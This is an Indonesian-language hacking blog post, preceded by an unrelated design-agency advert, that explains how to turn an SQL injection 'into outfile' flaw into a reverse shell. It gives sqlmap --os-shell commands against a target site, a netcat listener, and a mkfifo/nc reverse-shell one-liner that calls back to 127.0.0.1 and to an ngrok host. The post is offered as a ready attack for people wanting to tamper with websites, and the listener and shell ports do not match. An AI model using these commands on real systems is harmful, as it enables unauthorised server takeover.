Sql Injection Into Outfile to Reverse Shell (Backconnect)

  • Deviant Design Merupakan Layanan Jasa Desain dan Social Media Management Yang Mempunyai Pusat Di Jember. Dengan layanan yang murah, cepat dan pastinya dengan kualitas kelas atas. Mampu mengatur segala kebutuhanmu dalam mengelola social media.
Umm,,, Karna beberapa alasan nakanosec tidak bisa update dalam beberapa minggu ini, Tapi hari ini kita dah comeback lagi.. Hari ini kita bakalan bahas cara dapetin reverse shell dari bug sql injection into outfile. Well,, ini berguna banget buat kalian yang mau uwik uwik websitenya. Sebenernya emang ada opsi untuk backconnect di sqlmapnya (Metasploit) tapi untuk beberapa kasus tidak bisa digunakan, bahkan saya menggunakan beberapa command back connect seperti bash perl dan ruby tetap gagal. Terimakasih juga buat abang tomi dari noobsec yang udah bantuin. Sebelum exploitasi menggunakan sqlmap ada baiknya kita melakukan update pada sqlmap dan menggunkan cookie pada setiap proses exploitasi, hal ini akan sangat berpengaruh pada impact yang didapatkan.

Update SQLmap Command
python sqlmap.py --update
SQLmap Into Outfile Command
python sqlmap.py -u "site" --os-shell 
 Preview

Exploitasi

  • Pertama kita coba dulu buat into outfile

python sqlmap.py -u "site" --os-shell 

  • Kedua kita coba cek netcat pada server

which nc
Kalo di servernya ada netcat outputnya kayak diatas, kalo ga ada kalian harus install netcat manual

  • Ketiga kalian buat listener, karna saya ada vps ya saya bikin listenernya di vps tapi ini juga udah sempet saya coba di ngrok tetep bisa kok
nc -lvp 1337


  • Keempat masukin command backconnect yang bypass netcat version

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 127.0.0.1 1234 >/tmp/f
buat yang make ngrok
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 0.tcp.ngrok.io 1234 >/tmp/f

Preview 





Artikel Terbaru